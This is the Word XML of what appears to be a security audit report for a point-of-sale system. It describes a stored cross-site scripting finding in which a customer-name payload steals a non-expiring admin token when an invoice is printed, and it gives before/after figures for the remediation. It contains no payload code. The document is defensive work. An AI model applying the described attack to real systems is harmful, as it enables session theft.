    <w:p w14:paraId="136064DC" w14:textId="77777777" w:rsidR="0008357A" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"/>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Stored cross-site scripting that stole administrator sessions.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D86AA03" w14:textId="77777777" w:rsidR="0008357A" w:rsidRDefault="0008357A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB0C84C" w14:textId="77777777" w:rsidR="0008357A" w:rsidRDefault="008125F0" w:rsidP="0008357A">
      <w:pPr>
        <w:spacing w:after="0"/>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thermal-receipt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printer built</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML by string concatenation with no escaping anywhere in the codebase and the one function that looked like a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sanitiser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> had had </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>its</w: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68480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33472347" wp14:editId="4B212C2A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-10195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="638175" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31021" name="Group 31021"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="638175" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="638175" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="166" name="Shape 166"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2790"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4649"/>
                                  <a:pt x="638175" y="6895"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126455"/>
                                  <a:pt x="637245" y="128700"/>
                                  <a:pt x="635385" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132420"/>
                                  <a:pt x="631280" y="133350"/>
                                  <a:pt x="628650" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2790"/>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021" style="width:50.25pt;height:10.5pt;position:absolute;z-index:-2147483488;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-0.802856pt;" coordsize="6381,1333">
                <v:shape id="Shape 166" style="position:absolute;width:6381;height:1333;left:0;top:0;" coordsize="638175,133350" path="m9525,0l628650,0c631280,0,633525,930,635385,2790c637245,4649,638175,6895,638175,9525l638175,123825c638175,126455,637245,128700,635385,130559c633525,132420,631280,133350,628650,133350l9525,133350c6895,133350,4650,132420,2790,130559l0,123825l0,9525l2790,2790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.replace</w:t>
      </w:r>
      <w:proofErr w:type="spell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deleted, so it returned its input unchanged. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC586C" w14:textId="77777777" w:rsidR="0008357A" w:rsidRDefault="0008357A" w:rsidP="0008357A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6413C9" w14:textId="4B00FB7A" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="0008357A">
      <w:pPr>
        <w:spacing w:after="0"/>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A cashier could save a customer name containing a script payload;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6357E22E" w14:textId="0CA0C34B" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="0008357A">
      <w:pPr>
        <w:ind w:left="29" w:right="16"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69504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52A82B23" wp14:editId="188BBC6D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4704457</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-10482</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="752475" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31022" name="Group 31022"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="752475" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="752475" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="172" name="Shape 172"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="752475" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2790"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751544" y="4649"/>
                                  <a:pt x="752475" y="6895"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="126455"/>
                                  <a:pt x="751544" y="128701"/>
                                  <a:pt x="749685" y="130560"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="132420"/>
                                  <a:pt x="745580" y="133350"/>
                                  <a:pt x="742950" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130560"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128701"/>
                                  <a:pt x="0" y="126455"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6895"/>
                                  <a:pt x="930" y="4649"/>
                                  <a:pt x="2790" y="2790"/>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022" style="width:59.25pt;height:10.5pt;position:absolute;z-index:-2147483482;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:370.43pt;mso-position-vertical-relative:text;margin-top:-0.825439pt;" coordsize="7524,1333">
                <v:shape id="Shape 172" style="position:absolute;width:7524;height:1333;left:0;top:0;" coordsize="752475,133350" path="m9525,0l742950,0c745580,0,747825,930,749685,2790c751544,4649,752475,6895,752475,9525l752475,123825c752475,126455,751544,128701,749685,130560c747825,132420,745580,133350,742950,133350l9525,133350c6895,133350,4650,132420,2790,130560c930,128701,0,126455,0,123825l0,9525c0,6895,930,4649,2790,2790c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fired when an </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> later printed that invoice, exfiltrating the admin's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a token which, because of a separate finding, never expired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8CE896" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"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The measurable outcome:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10194" w:type="dxa"/>
        <w:tblInd w:w="38" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:tblCellMar>
          <w:right w:w="111" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3448"/>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="2333"/>
        <w:gridCol w:w="3310"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="4A19E998" w14:textId="77777777" w:rsidTr="00C23DD3">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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tcPr>
          <w:p w14:paraId="61C38F38" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="110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265A312F" w14:textId="499569ED" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00C23DD3" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="113" w:firstLine="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Before</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="233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tcPr>
          <w:p w14:paraId="6D1DA9BE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="331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2605DDC7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="112"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After</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="39009DE4" w14:textId="77777777" w:rsidTr="00C23DD3">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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F233EF0" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="113"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Attack scripts that succeed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="110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66326B68" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="233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374F560A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">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12 / 12 core suite + V-20 reproduced separately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="331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9A48EA1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0"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0 / 14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="2A4490D6" w14:textId="77777777" w:rsidTr="00C23DD3">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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7B600C7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="113"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Composer advisories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="110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4C48C109" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="233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E2261F2" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="331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28143511" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="3C0C2767" w14:textId="77777777" w:rsidTr="00C23DD3">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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23753C68" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="113" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> advisories (2 critical, 14 high)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="110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639B3360" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="233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40EE2A9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="331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A1A3FBD" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="1055ADAA" w14:textId="77777777" w:rsidTr="00C23DD3">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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395069EB" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="113"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Automated security tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="110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5CFC2B7E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="233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11D79C8" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="331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2D5D4E8" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00C23DD3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="551"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90</w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (230 assertions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31AD4249" w14:textId="77777777" w:rsidR="00C23DD3" w:rsidRPr="005C54CB" w:rsidRDefault="00C23DD3">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F3FD18" w14:textId="453C3440"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All findings were confirmed by executing the attack, not by reading code. Every fix is verified by a runnable script and by a regression test that fails against the original and passes against the fixed version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C3A28" w14:textId="77777777" w:rsidR="00C23DD3" w:rsidRDefault="00C23DD3">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE0AA89" w14:textId="77777777" w:rsidR="0008357A" w:rsidRDefault="0008357A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
